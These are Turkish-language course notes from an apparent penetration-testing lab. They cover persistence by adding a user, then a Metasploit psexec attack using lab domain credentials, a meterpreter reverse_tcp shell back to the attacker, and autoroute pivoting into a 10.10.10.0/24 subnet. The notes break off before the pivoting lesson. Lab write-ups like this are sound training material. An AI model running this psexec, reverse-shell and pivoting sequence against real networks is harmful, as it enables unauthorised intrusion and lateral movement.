File transfer için bunlar haricinde metasploit de vardır. Ftp yoluyla file upload download yapmayı sağlar.
Makineye kullanıcı ekleyip shell sağlayabiliriz. Diğer seçeneklerde ise makineye yeni bir port açarız ve bu portların herhangi bir kontrol mekanizması yoktur bu yüzden çok tehlikelidir. Ama kullanıcı eklersek makine kapansa bile açıldığında shelli kontrol edip tekrar çalıştırabiliriz.
Pivot işlemini yapmak için Windows 10 makinelerimizi kapatıyoruz. Bir makine bir networke bağlı olduğuna o makineyi ele geçirince network yardımıyla diğer makinelere de ulaşabiliriz.
????? ===> Lab kurulumu için lab setup videosunu izle ?????
Makineler hazır olduktan sonra msfconsole yazıp metsploit başlatıyoruz.
Daha sonra use exploit/windows/smb/psexec yazıyoruz daha sonra options yazıp seçeneklerine bakacağız. Rhosts belirliyoruz. smbdomaine marvel/local yazıyoruz. Bu active directory’deki domain adımız. set smbpass password1 ve set smbuser fcastle yazıyoruz böylece makinenin kullanıcı adı şifresini de set etmiş oluyoruz. Bunların hepsi active diretory derslerinde kullandığımız bilgiler. set payload windows/x64/meterpreter/reverse_tcp diyoruz. set lhost eth0 diyoruz ve herşeyi set etmiş oluyoruz. set target 2 diyoruz ve run ediyoruz. Ve shell elde etmiş oluyoruz.
shell yazıp giriş yaptık
route print yazıp routingi görebiliriz.
arp -a yazarak haberleşen makineleri görebiliriz. Daha sonra
run autoroute -s 10.10.10.0/24 yazıp bu shell aldığımız makineden diğer makineye route kurmasını sağlıyoruz. Bu aşamada pivoting başlıyor.
Devamı pivoting derslerinde …